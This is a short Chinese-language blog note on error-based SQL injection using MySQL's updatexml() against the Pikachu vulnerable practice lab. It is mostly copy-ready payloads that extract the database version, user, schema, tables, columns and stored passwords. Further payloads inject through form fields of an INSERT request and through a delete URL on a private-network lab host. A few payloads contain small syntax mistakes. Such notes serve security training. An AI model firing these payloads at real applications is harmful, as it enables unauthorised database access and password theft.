1、updatexml函数报错信息实现sql注入:
构造payload:
①爆破数据库版本
a' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)#'
select * from 表名 username='' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)#'
②爆破用户名
a' and updatexml(1,concat(0x7e,(select user()),0x7e),1)#'
select * from 表名 username='' and updatexml(1,concat(0x7e,(select user()),0x7e),1)#'
③爆破数据库
a' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#'
select * from 表名 username='' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#'
④爆破数据表
a' and updatexml(1,concat(0x7e,(select table_name() from information_schema.tables where table_schema="pikachu" limit 1,1),0x7e),0)#'
⑤爆破字段
查看密码:也得用limit 0,1
a' and updatexml(1,concat(0x7e,(select column_name() from information_schema.columns where table_name="users" limit 1,1),0x7e),0)#'
⑥爆破数据
a' and updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1)#'
2、insert报错
①username=111&password=111&sex=111&phonenum=111&email=111&add=111&submit=submit
②111' or updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '
③username=111' or updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '&password=111&sex=111&phonenum=111&email=111&add=111&submit=submit
3、detele报错
通过复制删除网址-然后在hackbar里面进行命令输入;
http://172.16.101.198/pikachu/vul/sqli/sqli_del.php?id=58 or updatexml(1,concat(0x7e,(select database()),0x7e),1)
版权声明:本文为weixin_45273343原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。